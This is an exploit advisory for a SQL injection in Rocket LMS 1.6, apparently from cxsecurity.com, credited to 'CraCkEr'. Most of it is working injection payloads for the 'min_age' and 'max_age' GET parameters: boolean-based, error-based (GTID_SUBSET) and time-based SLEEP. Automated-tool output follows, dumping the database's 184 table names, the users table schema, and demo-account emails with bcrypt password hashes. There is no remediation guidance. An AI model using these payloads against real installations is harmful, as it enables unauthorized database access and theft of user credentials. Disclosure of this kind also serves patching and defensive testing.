Rocket LMS 1.6 SQL Injection

2022.09.16
Credit: CraCkEr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : rocket-soft.org │ │ Rocket LMS - Learning Management System │ │ Vendor : RocketSoft │ │ │ │ Software : Rocket LMS v 1.6 │ │ is an online course marketplace with a │ │ Vuln Type: Remote SQL Injection │ │ pile of features that helps you to run │ │ Method : GET │ │ your online education business easily │ │ Impact : Database Access │ │ │ │ │ │ │ │────────────────────────────────────────────┘ └─────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL Ivo @palaziv CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ GET parameter 'min_age' is vulnerable --- Parameter: min_age (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=(SELECT (CASE WHEN (8536=8536) THEN 18 ELSE (SELECT 7625 UNION SELECT 1202) END))&max_age=99&day[]=saturday&min_time=&max_time=&country_id= Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(1687=1687,1))),0x71786a6a71),1687)&max_age=99&day[]=saturday&min_time=&max_time=&country_id= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND (SELECT 2819 FROM (SELECT(SLEEP(5)))SBYp)&max_age=99&day[]=saturday&min_time=&max_time=&country_id= --- GET parameter 'max_age' is vulnerable --- Parameter: max_age (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=(SELECT (CASE WHEN (2763=2763) THEN 99 ELSE (SELECT 3665 UNION SELECT 7462) END))&day[]=saturday&min_time=&max_time=&country_id= Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(5555=5555,1))),0x71786a6a71),5555)&day[]=saturday&min_time=&max_time=&country_id= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND (SELECT 2169 FROM (SELECT(SLEEP(5)))mngI)&day[]=saturday&min_time=&max_time=&country_id= --- [+] Starting the Attack [INFO] fetching current database [INFO] the back-end DBMS is MySQL web application technology: Apache 2, PHP 7.4.30 back-end DBMS: MySQL >= 5.6 current database: 'admin_learn' [INFO] fetching tables for database: 'admin_learn' Database: admin_learn [184 tables] +------------------------------------------------+ | groups | | accounting | | advertising_banners | | advertising_banners_translations | | affiliates | | affiliates_codes | | agora_history | | badge_translations | | badges | | become_instructors | | blog | | blog_categories | | blog_translations | | bundle_filter_option | | bundle_translations | | bundle_webinars | | bundles | | cart | | categories | | category_translations | | certificate_template_translations | | certificates | | certificates_templates | | comments | | comments_reports | | contacts | | course_forum_answers | | course_forums | | course_learning | | course_noticeboard_status | | course_noticeboards | | delete_account_requests | | discount_categories | | discount_courses | | discount_groups | | discount_users | | discounts | | faq_translations | | faqs | | favorites | | feature_webinar_translations | | feature_webinars | | file_translations | | files | | filter_option_translations | | filter_options | | filter_translations | | filters | | follows | | forum_featured_topics | | forum_recommended_topic_items | | forum_recommended_topics | | forum_topic_attachments | | forum_topic_bookmarks | | forum_topic_likes | | forum_topic_posts | | forum_topic_reports | | forum_topics | | forum_translations | | forums | | group_users | | groups_registration_packages | | home_sections | | jazzcash_transactions | | meeting_times | | meetings | | migrations | | navbar_button_translations | | navbar_buttons | | newsletters | | newsletters_history | | noticeboards | | noticeboards_status | | notification_templates | | notifications | | notifications_status | | offline_payments | | order_items | | orders | | page_translations | | pages | | password_resets | | payku_payments | | payku_transactions | | payment_channels | | payouts | | payu_transactions | | permissions | | prerequisites | | product_categories | | product_category_translations | | product_discounts | | product_faq_translations | | product_faqs | | product_file_translations | | product_files | | product_filter_option_translations | | product_filter_options | | product_filter_translations | | product_filters | | product_media | | product_orders | | product_reviews | | product_selected_filter_options | | product_selected_specification_multi_values | | product_selected_specification_translations | | product_selected_specifications | | product_specification_categories | | product_specification_multi_value_translations | | product_specification_multi_values | | product_specification_translations | | product_specifications | | product_translations | | products | | promotion_translations | | promotions | | purchases | | quiz_question_translations | | quiz_translations | | quizzes | | quizzes_questions | | quizzes_questions_answer_translations | | quizzes_questions_answers | | quizzes_results | | rating | | regions | | registration_packages | | registration_packages_translations | | reserve_meetings | | rewards | | rewards_accounting | | roles | | sales | | sales_log | | sections | | session_reminds | | session_translations | | sessions | | setting_translations | | settings | | special_offers | | subscribe_reminds | | subscribe_translations | | subscribe_uses | | subscribes | | support_conversations | | support_department_translations | | support_departments | | supports | | tags | | testimonial_translations | | testimonials | | text_lesson_translations | | text_lessons | | text_lessons_attachments | | ticket_translations | | ticket_users | | tickets | | trend_categories | | users | | users_badges | | users_cookie_security | | users_manual_purchase | | users_metas | | users_occupations | | users_registration_packages | | users_zoom_api | | verifications | | webinar_assignment_attachments | | webinar_assignment_history | | webinar_assignment_history_messages | | webinar_assignment_translations | | webinar_assignments | | webinar_chapter_items | | webinar_chapter_translations | | webinar_chapters | | webinar_extra_description_translations | | webinar_extra_descriptions | | webinar_filter_option | | webinar_partner_teacher | | webinar_reports | | webinar_reviews | | webinar_translations | | webinars | +------------------------------------------------+ [INFO] fetching columns for table 'users' in database 'admin_learn' Database: admin_learn Table: users [49 columns] +--------------------+-------------------------------------+ | Column | Type | +--------------------+-------------------------------------+ | language | varchar(255) | | about | text | | access_content | tinyint(1) | | account_id | varchar(128) | | account_type | varchar(128) | | address | varchar(255) | | affiliate | tinyint(1) | | avatar | varchar(255) | | avatar_settings | varchar(255) | | ban | tinyint(1) | | ban_end_at | int(10) unsigned | | ban_start_at | int(10) unsigned | | bio | varchar(128) | | can_create_store | tinyint(1) | | certificate | varchar(128) | | city_id | int(10) unsigned | | commission | int(10) unsigned | | country_id | int(10) unsigned | | cover_img | varchar(255) | | created_at | int(11) | | deleted_at | int(11) | | district_id | int(10) unsigned | | email | varchar(255) | | facebook_id | varchar(255) | | financial_approval | tinyint(1) | | full_name | varchar(128) | | google_id | varchar(255) | | headline | varchar(255) | | iban | varchar(128) | | id | int(10) unsigned | | identity_scan | varchar(128) | | level_of_training | bit(3) | | location | point | | meeting_type | enum('all','in_person','online') | | mobile | varchar(32) | | newsletter | tinyint(1) | | offline | tinyint(1) | | offline_message | text | | organ_id | int(11) | | password | varchar(255) | | province_id | int(10) unsigned | | public_message | tinyint(1) | | remember_token | varchar(255) | | role_id | int(10) unsigned | | role_name | varchar(64) | | status | enum('active','pending','inactive') | | timezone | varchar(255) | | updated_at | int(11) | | verified | tinyint(1) | +--------------------+-------------------------------------+ [INFO] fetching entries of column(s) 'account_id,account_type,email,id,password' for table 'users' in database 'admin_learn' Database: admin_learn Table: users [4 entries] +------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+ | id | account_id | account_type | email | password | +------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+ | 1 | NULL | NULL | admin@demo.com | $2y$10$nSUg1Z2rltHGecudC6dEEeRoqfIhlHi8WaAFFQs57oyFtpkvvQufW | | 867 | NULL | NULL | organization@demo.com | $2y$10$W0.rfZgYCWGr/rOSrGrGg.Nnm6xBVdR3FYjJiXqiq6LZdx2Ds.aXq | | 995 | NULL | NULL | student@demo.com | $2y$10$Hc4OzTkL3i5vmHXXvZvSfOsZDMD/XYwO4yS8UOtUIAFQcXYhIIJsa | | 1015 | NULL | NULL | instructor@demo.com | $2y$10$8.jgtS/cg8L6HfuuBgWnkeg49r0LiY7kofR6eiY9b.mx747i82n.u | +------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+ [-] Done


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top